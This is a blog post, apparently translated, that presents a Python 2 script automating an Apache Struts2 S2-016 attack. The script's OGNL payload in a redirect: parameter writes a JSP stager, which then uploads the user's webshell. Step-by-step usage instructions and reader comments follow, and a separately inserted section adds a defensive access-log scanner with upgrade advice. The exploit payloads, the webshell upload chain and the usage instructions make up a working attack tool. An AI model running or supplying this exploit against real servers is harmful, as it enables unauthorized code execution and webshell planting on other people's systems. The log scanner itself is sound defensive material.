struts2 S2-016/S2-017 Python GetShell

I had been looking at PHP, writing a CTF for the club, when I happened to see the newest Struts2 vulnerability and getshell posted on WooYun; I can barely read JSP anyway. After poking at it for a while I found it quite interesting, so I wrote a Python script to automate the getshell~

……Before I knew it, it was almost 3 a.m.……



# coding: utf-8
__author__ = 'Phtih0n'
import requests, sys, urllib

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}

def GetHost(url):
    # Reduce a full URL to its scheme://host/ root
    (type, rest) = urllib.splittype(url)
    (host, rest) = urllib.splithost(rest)
    return (type + "://" + host + "/")

def UpData(url):
    # Read the local shell.jsp and post it to the stager phithon.jsp as
    # parameter 't'; the stager saves it under the file name given in 'f'
    ma = open("shell.jsp")
    content = ma.read()
    ma.close()
    param = {}
    param['f'] = 'bakup.jsp'
    param['t'] = content
    r = requests.post(url + "phithon.jsp", data=param, headers=headers)
    r = requests.get(url + param['f'], headers=headers, allow_redirects=False)
    if 200 == r.status_code:
        print "success"
        print "shell : " + url + param['f']
    else:
        print "fail"

def GetShell(url):
    # Step 1: the S2-016 redirect: parameter is evaluated as OGNL and writes
    # the small stager phithon.jsp (passed in parameter c) into the web root
    test = url + r'''/Struts2/test.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22phithon.jsp%22).replaceAll("\\\\", "/"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e'''
    r = requests.get(test, headers = headers )
    url = GetHost(url)
    # Step 2: only upload the real webshell once the stager is confirmed present
    r = requests.get(url + "phithon.jsp", headers = headers)
    if r.status_code == 200:
        UpData(url)
    else:
        print "fail"

try:
    url = sys.argv[1]
except IndexError:
    print "usage : %s url" % sys.argv[0]
    sys.exit(1)
GetShell(url)

#/Struts2/test.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[phithon]'),%23w.flush(),%23w.close()}
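Added here as a defensive counterpart, not code from the original post: a Python 3 scanner for web-server access logs that flags the request pattern the script above relies on. S2-016 evaluated the `redirect:` parameter prefix (and the related `redirectAction:` and `action:` prefixes) as OGNL; Struts 2.3.15.1 and later no longer do, so upgrading is the fix, and scanning past logs for these prefixes carrying `${` or `%{` shows whether anyone already tried. Parameters are percent-decoded before matching so encoded variants are caught, and a plain `redirect:/index.jsp` without an expression marker is not reported. The log lines, client addresses and function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Struts 2 parameter-name prefixes that S2-016 evaluated as OGNL (pre 2.3.15.1).
STRUTS_PREFIXES = ("redirect:", "redirectaction:", "action:")
# Markers of an OGNL expression inside the decoded parameter.
OGNL_MARKERS = ("${", "%{")

# Combined-format request line: client ... [time] "METHOD target HTTP/x.y" status
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log (not from the page): lines 1 and 3 carry OGNL in a
# Struts prefix, line 5 is a benign redirect: use, the rest are ordinary hits.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jul/2013:02:41:13 +0800] "GET /Struts2/test.action?redirect:${%23w%3d%23context.get('x')}&c=1 HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jul/2013:02:42:00 +0800] "GET /Struts2/test.action?name=alice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jul/2013:02:42:30 +0800] "POST /Struts2/login.action?redirectAction:%24%7B1%2B1%7D HTTP/1.1" 200 77 "-" "curl/7.29"
10.0.0.9 - - [10/Jul/2013:02:43:10 +0800] "GET /Struts2/redirect:page HTTP/1.1" 404 0 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Jul/2013:02:44:02 +0800] "GET /Struts2/test.action?redirect:/index.jsp HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def suspicious_params(target):
    """Return [(prefix, decoded_param)] for each query parameter whose name
    starts with a Struts action prefix and whose decoded name or value
    contains an OGNL marker."""
    query = urlsplit(target).query
    hits = []
    # keep_blank_values: the payload usually has no '=' at all, so the whole
    # expression is the parameter *name* and the value is empty.
    for name, value in parse_qsl(query, keep_blank_values=True):
        lname = name.lower()
        for prefix in STRUTS_PREFIXES:
            if lname.startswith(prefix):
                decoded = name if value == "" else name + "=" + value
                if any(marker in decoded for marker in OGNL_MARKERS):
                    # report the prefix in its original case
                    hits.append((name[:len(prefix)], decoded))
                break
    return hits


def scan_log(text):
    """Scan combined-format access-log text; return one finding per flagged
    parameter with the line number, client, method, status and decoded value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue
        for prefix, decoded in suspicious_params(m.group("target")):
            findings.append({
                "line": lineno,
                "client": m.group("client"),
                "method": m.group("method"),
                "status": m.group("status"),
                "prefix": prefix,
                "param": decoded[:120],
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("line %(line)d %(client)s %(method)s %(status)s %(prefix)s -> %(param)s" % f)
```

On the sample above it reports lines 1 and 3 only. A 302 or 200 on such a request does not by itself prove success; the follow-up to check is whether a new `.jsp` appeared in the web root right after the flagged request, which is exactly what the script above does from the attacker's side.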



Requirements and usage:

1. Install the requests library for Python; installation instructions are here: https://www.leavesongs.com/PYTHON/PythonGetLink.html

2. Rename your own JSP webshell to "shell.jsp" and put it in the same directory

3. Usage: UseOfStruts.py http://xxxx/ and that's it:

(screenshot 001.jpg)

JSP usually runs with fairly high privileges; once you have a webshell it is usually administrator or the like:

(screenshot 002.jpg)

That's all for now, keep poking at it everyone~ I'm off to bed……

I have packaged the source file and the JSP webshell I used as an attachment.

Lastly, this code is for learning only; please do not use it as an attack tool to test domestic websites.

Attachment: Py Struts Getshell.zip


Comments

Floyd

Thanks for finally writing about >struts2 S2-016/S2-017 Python GetShell | 离别歌 <Loved it!

hedpy

r = requests.post(url + "phithon.jsp", data=param, headers=headers)
What is the phithon.jsp in this line of code?

Also, it throws this error:
Traceback (most recent call last):
File "1.py", line 40, in <module>
GetShell(url)
File "1.py", line 32, in GetShell
UpData(url)
File "1.py", line 18, in UpData
r = requests.post(url + "phithon.jsp", data=param, headers=headers)
File "D:\Python27\lib\site-packages\requests\api.py", line 111, in post
return request('post', url, data=data, json=json, **kwargs)
File "D:\Python27\lib\site-packages\requests\api.py", line 57, in request
return session.request(method=method, url=url, **kwargs)
File "D:\Python27\lib\site-packages\requests\sessions.py", line 475, in request
resp = self.send(prep, **send_kwargs)
File "D:\Python27\lib\site-packages\requests\sessions.py", line 585, in send
r = adapter.send(request, **kwargs)
File "D:\Python27\lib\site-packages\requests\adapters.py", line 453, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', error(10054, ''))
